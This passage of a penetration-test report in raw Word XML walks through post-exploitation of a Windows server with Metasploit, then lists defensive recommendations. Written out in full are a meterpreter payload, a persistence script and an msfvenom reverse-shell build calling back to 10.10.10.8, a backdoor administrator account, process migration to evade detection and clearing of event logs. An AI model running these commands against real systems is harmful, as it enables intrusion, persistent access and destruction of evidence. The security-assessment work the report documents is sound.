      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00473656" w:rsidRDefault="00473656" w:rsidP="00473656">
      <w:r>
        <w:t xml:space="preserve">The options command was used again to see what information </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>had to be manually entered (ref13</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00473656" w:rsidRDefault="00473656" w:rsidP="00473656">
      <w:r>
        <w:t>The receiving host RHOST (victim machine) IP address was set</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t xml:space="preserve"> (ref14</w:t>
      </w:r>
      <w:r>
        <w:t>) and a bind tcp payload was selected following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00473656" w:rsidRDefault="00473656" w:rsidP="00CB1561">
      <w:r w:rsidRPr="00311E66">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>set payload/windows/x64/meterpreter/bind_tcp</w:t>
      </w:r>
      <w:r w:rsidR="00311E66" w:rsidRPr="00311E66">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>(ref15</w:t>
      </w:r>
      <w:r w:rsidR="00311E66">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311E66" w:rsidRDefault="00311E66" w:rsidP="00CB1561">
      <w:r>
        <w:t>The payload was sent and executed and a listener handler was started against the victim machines port 4444 with the simple command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00311E66" w:rsidP="00607724">
      <w:r w:rsidRPr="00311E66">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>(ref16</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724"/>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc2777729"/>
      <w:r>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Post-Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:r>
        <w:t>This section includes the post-exploitation techniques applied to achieve the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maintaining access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Process Migration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adding of accounts/groups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRPr="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Covering tracks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F21FD" w:rsidRDefault="001F21FD" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc2777730"/>
      <w:r>
        <w:t xml:space="preserve">2.3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00AD38C3" w:rsidRPr="00D357F9" w:rsidRDefault="001F21FD" w:rsidP="001F21FD">
      <w:r w:rsidRPr="00D357F9">
        <w:t>Meterpreter is a dynamically extensible payload that uses in-memory DLL injection stagers to inject processes into a running victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311E66" w:rsidRPr="00D357F9" w:rsidRDefault="00311E66" w:rsidP="001F21FD">
      <w:r w:rsidRPr="00D357F9">
        <w:t>A Meterpreter session was open and the exploit was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311E66" w:rsidRDefault="00311E66" w:rsidP="001F21FD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00311E66" w:rsidRDefault="00D357F9" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc2777731"/>
      <w:r>
        <w:t xml:space="preserve">2.3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00D357F9" w:rsidRPr="00D357F9" w:rsidRDefault="00D357F9" w:rsidP="00D357F9">
      <w:r w:rsidRPr="00D357F9">
        <w:t xml:space="preserve">At this point the meterpreter session only has basic privileges, for the tester to be able to carry out further tests including the addition of accounts these privileges must be escalated. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D357F9" w:rsidRPr="00D357F9" w:rsidRDefault="00D357F9" w:rsidP="00D357F9">
      <w:r w:rsidRPr="00D357F9">
        <w:t>System privileges were acquired with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D357F9" w:rsidRDefault="00D357F9" w:rsidP="00D357F9">
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00D357F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>etsystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>(ref17</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D357F9" w:rsidRDefault="00D357F9" w:rsidP="00D357F9">
      <w:r>
        <w:t>The tester continued with the escalation by acquiring administration privileges using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D357F9" w:rsidRDefault="00D357F9" w:rsidP="00D357F9">
      <w:r w:rsidRPr="00D357F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>getprivs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>(ref18</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00D357F9">
      <w:r>
        <w:t>Now the tester had efficient permissions to continue with the maintaining access phase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00D357F9"/>
    <w:p w:rsidR="00C64D69" w:rsidRDefault="00C64D69" w:rsidP="00D357F9"/>
    <w:p w:rsidR="00C64D69" w:rsidRDefault="00C64D69" w:rsidP="00D357F9"/>
    <w:p w:rsidR="00C64D69" w:rsidRDefault="00C64D69" w:rsidP="00D357F9"/>
    <w:p w:rsidR="00C64D69" w:rsidRPr="00D357F9" w:rsidRDefault="00C64D69" w:rsidP="00D357F9"/>
    <w:p w:rsidR="00D357F9" w:rsidRDefault="00D357F9" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="20" w:name="_Toc2777732"/>
      <w:r w:rsidR="00607724">
        <w:t xml:space="preserve">2.3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00607724">
        <w:t>Maintaining Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00607724" w:rsidRDefault="00607724" w:rsidP="00607724">
      <w:r>
        <w:t xml:space="preserve">This stage is another crucial point in the test as this is where an attacker </w:t>
      </w:r>
      <w:r w:rsidR="00C64D69">
        <w:t>would create a back door, so the machine can be easily accessed by the attacker whenever the victim machine is live.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C64D69" w:rsidRDefault="00C64D69" w:rsidP="00607724">
      <w:r>
        <w:t xml:space="preserve">This was done with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D801C2">
        <w:t>meterpreters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> built in persistence script with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C64D69" w:rsidRDefault="00C64D69" w:rsidP="00607724">
      <w:r w:rsidRPr="00C64D69">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>run persistence –A  –L  c:\\ -X 30  –p443  –r  10.10.10.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64D69">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>ref19</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C64D69" w:rsidRDefault="00C64D69" w:rsidP="00607724">
      <w:r>
        <w:t>What this command does is runs the persistence script creating a payload that will load into ram on boot and send packets every 30 seconds to the local machine (attacking machine) looking for a listener handler so it can start the reverse_tcp meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177820" w:rsidRDefault="00177820" w:rsidP="00607724">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Another test similar to this was carried out. A payload was written with msfvenom (a meterpreter payload writing module) with the following command :</w:t>
      </w:r>
      <w:r w:rsidRPr="00177820">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C64D69" w:rsidRDefault="00177820" w:rsidP="00607724">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177820">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>msfvenom –p windows/x64/meterpreter/reverse_tcp –b “\x00” lhost =10.10.10.8 lport=4444 –i 5 –f exe –o ./test.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
        <w:t>(ref20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177820" w:rsidRDefault="00177820" w:rsidP="00607724">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
        <w:t>Another handler was set up to listen for the connection and a 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00177820">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
        <w:t xml:space="preserve"> meterpreter sessions was started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A78" w:rsidRDefault="00CA0A78" w:rsidP="00607724">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
        <w:t>This also demonstrated the ability to upload files to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177820" w:rsidRDefault="00177820" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc2777733"/>
      <w:r>
        <w:t xml:space="preserve">2.3.4 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Process Migration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00177820" w:rsidRDefault="00177820" w:rsidP="00177820">
      <w:r>
        <w:t xml:space="preserve">In an attempt to stay undetected on the machine the tester decided to conceal the </w:t>
      </w:r>
      <w:r w:rsidR="00DA574B">
        <w:t>malicious process running the meterpreter session by moving it to another port and disguised it as a less suspicious type of process (ref</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00DA574B">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA574B" w:rsidRDefault="00DA574B" w:rsidP="00177820">
      <w:r>
        <w:t>This was done using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA574B" w:rsidRDefault="00DA574B" w:rsidP="00177820">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA574B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>use post/windows/manage/migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA574B" w:rsidRDefault="00DA574B" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc2777734"/>
      <w:r>
        <w:t xml:space="preserve">2.3.5 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Adding Accounts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00CA0A78" w:rsidRDefault="00CA0A78" w:rsidP="00CA0A78">
      <w:r>
        <w:t>To add an account a shell was opened on the server using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A78" w:rsidRPr="00CA0A78" w:rsidRDefault="00CA0A78" w:rsidP="00CA0A78">
      <w:r w:rsidRPr="00CA0A78">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0A78">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>(ref22</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A78" w:rsidRDefault="00CA0A78" w:rsidP="00CA0A78">
      <w:r>
        <w:t>Next the tester successfully added a new user account with a password on the server with the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A78" w:rsidRDefault="00CA0A78" w:rsidP="00CA0A78">
      <w:r w:rsidRPr="00CA0A78">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>net user testacc P@$$word /</w:t>
      </w:r>
      <w:r>
        <w:t>add (ref</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A78" w:rsidRDefault="00CA0A78" w:rsidP="00CA0A78">
      <w:r>
        <w:t>The account was then added to the administrators group using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A78" w:rsidRDefault="00CA0A78" w:rsidP="00CA0A78">
      <w:r w:rsidRPr="00055DE4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>net localgroup administrators testacc /add</w:t>
      </w:r>
      <w:r w:rsidRPr="00055DE4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(ref</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055DE4" w:rsidRDefault="00055DE4" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc2777735"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.3.5 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Covering Tracks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055DE4" w:rsidRDefault="00055DE4" w:rsidP="00055DE4">
      <w:r>
        <w:t>The tester then proceeded to cover his tracks by clearing the server</w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s logs so anything reported to the logs has now been deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055DE4" w:rsidRDefault="00055DE4" w:rsidP="00055DE4">
      <w:r>
        <w:t>This was done from meterpreter with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055DE4" w:rsidRPr="00055DE4" w:rsidRDefault="00055DE4" w:rsidP="00055DE4">
      <w:r w:rsidRPr="00055DE4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>clearev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t>(ref25</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A865B8" w:rsidRDefault="00A865B8" w:rsidP="00CB1561"/>
    <w:p w:rsidR="00055DE4" w:rsidRDefault="00055DE4" w:rsidP="00055DE4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc2777736"/>
      <w:r>
        <w:t>3. Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00055DE4" w:rsidRPr="00055DE4" w:rsidRDefault="00E572EA" w:rsidP="00055DE4">
      <w:r>
        <w:t xml:space="preserve">If this organization wishes </w:t>
      </w:r>
      <w:r w:rsidR="00055DE4">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00CC6D87">
        <w:t>tender for military contracts there it is essential that several measures must be put in place immediately to secure the network before it would be considered viable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055DE4" w:rsidRDefault="00CC6D87" w:rsidP="00CC6D87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc2777737"/>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00CC6D87" w:rsidRDefault="00CC6D87" w:rsidP="00CC6D87">
      <w:r>
        <w:t xml:space="preserve">First a proper firewall should be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>installed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and rules should be applied restricting network users access to unauthorized ports.</w:t>
      </w:r>
      <w:r w:rsidR="00E572EA">
        <w:t xml:space="preserve"> Other rules should be put in place to block certain ports altogether.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6D87" w:rsidRDefault="00CC6D87" w:rsidP="00CC6D87">
      <w:r>
        <w:t>Automatic updates should be allowed and a schedule for taking routine backups should be put in place in the event of a hardware issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6D87" w:rsidRDefault="00E572EA" w:rsidP="00CC6D87">
      <w:r>
        <w:t>Group policies should be put in place restricting unauthorized users from using specific software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E572EA" w:rsidRDefault="00E572EA" w:rsidP="00CC6D87">
      <w:r>
        <w:t xml:space="preserve">I would also recommend that any personal using the machines or network would have had some cyber resilience </w:t>
      </w:r>
      <w:r w:rsidR="00921512">
        <w:t>training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921512" w:rsidRDefault="00921512" w:rsidP="00CC6D87">
      <w:r>
        <w:t xml:space="preserve">Stricter password policies should be put in place and any sensitive should be encrypted and saved in a directory only available to authorized </w:t>
      </w:r>
      <w:r w:rsidR="008B3208">
        <w:t>personnel</w:t>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00CC6D87" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc2777738"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162" w:rsidP="00E46162">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Ref 1 </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D62248D" wp14:editId="2920F4C3">
            <wp:extent cx="5486400" cy="54209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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="5420995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162" w:rsidP="00E46162"/>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162" w:rsidP="00E46162"/>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E67361" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="705AB7E0" wp14:editId="634D00D0">
            <wp:extent cx="5486400" cy="14897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9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1489710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162"/>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C250FE5" wp14:editId="54DF7FFC">
            <wp:extent cx="5486400" cy="2902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902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162"/>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ref4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3DBE71" wp14:editId="64BFAAFF">
            <wp:extent cx="5486400" cy="3531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531235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162"/>
